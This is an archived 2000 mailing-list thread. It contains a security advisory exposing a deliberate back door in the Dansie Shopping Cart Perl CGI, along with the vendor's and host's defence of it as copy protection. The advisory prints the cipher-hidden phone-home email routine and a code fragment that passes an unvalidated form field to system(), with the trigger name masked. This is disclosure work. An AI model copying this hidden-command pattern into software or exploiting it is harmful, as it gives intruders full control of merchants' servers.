This is what people at dansie said:
---------------------------------
At 05:29 AM 4/14/00 , you wrote:
>
> I've already sent you an email...
> Tell me why there's a way that anyone can execute code by using your
script..
> I want an answer rigth now.
>
Luciano,
The software has a copyright protection feature that poses no security risk
to
your website or your web server. It's designed to prevent software piracy
and
prevent pirates from running unlicensed copies. The cart is designed with
security in mind. For more details on security, see section 1 in the ReadMe.
http://www.dansie.net/cart_readme.html
Last month a person violated the software license agreement and tried to
modify
the script and remove the copyright credit to www.dansie.net. After they
decoded
the software copyright protection feature, they posted it on some message
boards. If I can be of further help with the cart or if you would like an
upgrade of the latest version, let me know.
Here is a snippet from our web host:
Nothing to be worried about on the mall version. However, if any of your
clients have
a single user licence cart, now that this is public information, if the cart
version is 3.04 and above
you might request an upgrade from Craig Dansie.
Basically, it allows Craig to prevent theifs from stealing his script. I
have known about it for awhile.
The "main" reason this guy is ticked off is because he "violated" the
copyright of Craig Dansie and hacked the script. It is not said so in so
many words, but basically.. he did. Craig scrambled his vars.dat because he
would not respond to Craig regarding the copyright violation.
If the cart is registered for a particular domain name, it will only work on
that one domain name. Craig puts a security code in all carts to insure it
cannot be used on a different domain name. This is his right to do so to
protect his lievely hood.
One thing this article does not cover is the fact that Craig "does" rotate
the codes for the cart. On about a weekly schedule. However, since this
guy has made public this information, ( yes I recieved two copies of this
email as well )... it might behoove you to request an upgrade to any single
user cart.
There is "no" processes Craig can run on the server as this email suggest.
Yes, he can wipe the vars.dat to protect his copyright and prevent the cart
from working, but the only people that need to worry are "theifs" anyway.
The cart "cannot" retrieve cc information or any other information that
could cause a security risk.
I personally talked with Brian McWilliams at www.internetnews.com on the
phone this morning. He did not mention a single thing I said regarding the
cart. He is out for a "story".
Give me a call if you have any questions.
James
Stormer Hosting
http://stormerhosting.com
[EMAIL PROTECTED]
Regards,
Craig Dansie
Dansie Shopping Cart
http://www.dansie.net
FAQ: http://www.dansie.net/cgi-bin/faq.pl
-----------------------------------------------------
----- Original Message -----
From: Luciano Ramos <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, April 13, 2000 9:58 AM
Subject: Re: Back Door in Commercial Shopping Cart
> I have purchased dansie's shooping cart I have been using it .. for a
> while.. The version of the cart I am currently using is 2.84, this version
> has the there,there2,there3 functions and the mail sending is in the
code..
> but as of 2.84... the system("FORM(xxxxxx)") is not implemented,,
> A couple of months ago.. people at dansie sent me the upgrade of the cart
> it was version.3.03 this versions does have the system call, I've already
> sent
> a mail to dansie to see what he says ...
>
> Thanks ..
>
> Luciano Ramos
> [EMAIL PROTECTED]
>
> ----- Original Message -----
> From: Joe <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, April 11, 2000 9:24 PM
> Subject: Back Door in Commercial Shopping Cart
>
>
> > Trojanized Commercial Shopping Cart
> > ===============================================================
> >
> > Dansie Shopping Cart
> >
> > Version : 3.04 (presumably earlier versions as well)
> > Author : Craig Dansie
> > URL : http://www.dansie.net/
> > Language : Perl (both NT and Unix platforms are vulnerable)
> > License : Commercial, starting at $150.00
> > Copyright Dec 10, 1997-2000, Dansie Website Design
> >
> >
> > Synopsis : This program -deliberately- allows arbitrary commands to be
> > executed on the victim server.
> >
> >
> > One of our clients, while installing and configuring the Dansie Shopping
> > Cart, ran into difficulty integrating PGP, the shopping cart program,
and
> > our secure server setup. While trying to assist our client with the
cart
> > and PGP configuration we discovered a couple of things.
> >
> > The CGI, under certain conditions, sends an email to the author of the
> > Dansie shopping cart software, '[EMAIL PROTECTED]'. This is not readily
> > apparent as the code that handles this transaction incorporates a simple
> > Caesar Cipher to hide the email address. The cipher is handled via the
> > subroutine 'there2':
> >
> > ------
> > sub there2
> > {
> > $_ = "$_[0]";
> > tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
> > tr/_/-/;
> > tr/\@/\./;
> > return $_;
> > }
> > -------
> >
> > The call that creates this email address and sends the mail is the
> > function 'there3'.
> >
> > -------
> > sub there3
> > {
> > if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e
"$mailprog"))
> > {
> > $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
> > $b = &there2('8v59_3jhhzi8');
> > pop(@there2);
> > pop(@there2);
> > $c = &there2("@there2");
> > open (TECH, "|$mailprog $a");
> > print TECH "To: $a\n";
> > print TECH "From: $a\n";
> > print TECH "Subject: $b\n\n";
> > print TECH "$path3\n";
> > print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
> > print TECH "$c\n";
> > print TECH "$e $there\n" if ($e);
> > close (TECH);
> > }
> > }
> > -------
> >
> > The ciphered strings, when passed through 'there2', result in:
> >
> > 8v59 == tech
> > kte3cv == dansie
> > ev8 == net
> > 8v59_3jhhzi8 == tech-support
> > $a == [EMAIL PROTECTED]
> > $b == Subject: tech-support
> >
> > This seems curious, but plausible reasons could include insuring License
> > compliance, or maybe the cart automatically sends this email when an
error
> > occurs. The program definitely goes out of its way to hide the fact that
> the
> > mail is being sent.
> >
> > While going through the rest of the code we discovered a much more
> > interesting item.
> >
> > (We've masked out the actual trigger element with question marks)
> >
> > ----------
> > if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) ||
> ($FORM{'?????????'} ) && (!$d) ) )
> > {
> > if ( $ENV{'OS'} )
> > {
> > system("$FORM{'?????????'}");
> > }
> > else
> > {
> > open(ELIF,"|$FORM{'?????????'}");
> > }
> > exit;
> > }
> > ---------
> >
> > The form element '?????????', which was originally a pseudo-random
> appearing
> > nine digit string of letters and numbers, allows an intruder to execute
> any
> > command on the server with the same privileges as the CGI process
itself.
> > Although this is a full disclosure list, the trigger element is obscured
> to
> > prevent the script kiddies from running away with this back door. If
you
> > own the cart, then you have access to the source code and can discover
the
> > element in question easily enough on your own.
> >
> > Further searches through the code reveal that this form element is
immune
> > to data validation - it gets passed into this code fragment
unchallenged.
> >
> > The '$d' variable of the condition which permits the back door to
function
> > is set elsewhere in the program to contain the string 'dansie'. (Again,
> > using the ciphertext algorithm) This indicates that the form element
won't
> > work on Dansie's own host, but will work on anyone elses. There are
> > additional problems with the 'there' function but we'll leave them as
> > exercises for the reader to decipher.
> >
> > Dansie.net, armed with the server name and URL to the CGI executable
> > provided by the cloaked email routine, would be able to run commands on
> any
> > web server on the Internet that has the Dansie Shopping Cart installed.
It
> > takes little imagination to dream up the potential havoc and privacy
> > violations this level of access could result in; from stealing private
> > customer records to a full-blown crack of an E-Commerce server.
> >
> > When checking to see if this was a known issue, the following post from
> > "Kasey Johns" <kasey at corridor dot net>, made a little over a week
ago,
> > was discovered in alt.comp.perlcgi.freelance:
> >
> > http://www.deja.com/getdoc.xp?AN=601644315
> > Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849
> >
> > We won't quote Kasey's posts here, in brief, Kasey also discovered the
> back
> > door and cloaked email routines. Kasey also provides evidence in the
post
> to
> > indicate that not only is Dansie well aware of the back door routine,
but
> > may be actively attempting to utilize it.
> >
> > Based upon our own investigation, the information Kasey posted, and our
> own
> > firewall logs (see below), it is our opinion that the back door within
> > Dansie.net's shopping cart can best be summarized as follows:
> >
> > 1. The back door is very deliberate.
> > 2. It isn't unique to the one copy we have access to here.
> > 3. *Is being actively utilized by the author of the CGI.
> >
> > * Based upon the log snippet in Kasey's post showing attempted access to
> > the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to
> > Kasey, access to the CGI was attempted less than 30 minutes after the
cart
> > was installed.
> >
> > When we noticed the attempted usage of Kasey's server, a quick check of
> our
> > own firewall logs revealed the following:
> >
> > Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
> > {repeated several dozen times}
> >
> > We can only assume these attempts, made from the same /24 on Earthlink's
> > dial-ups as the one used to probe Kasey's server, were from the author
of
> > the shopping cart.
> >
> > We will not try to hazard a guess as to why Dansie.net felt the need to
> > include a back door within their shopping cart software. Whatever their
> > reasoning may be, it is our opinion that no reason, no matter how well
> > thought out or rationalized, justifies the existence of this back door.
No
> > reasoning can possibly explain away a routine that deliberately allows
an
> > intruder unrestricted and unauthorized access to any server on the
> Internet
> > that has the Dansie Shopping Cart installed.
> >
> > --
> > Joe Technical Support
> > General Support: [EMAIL PROTECTED] Blarg! Online Services, Inc.
> > Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
> >
>
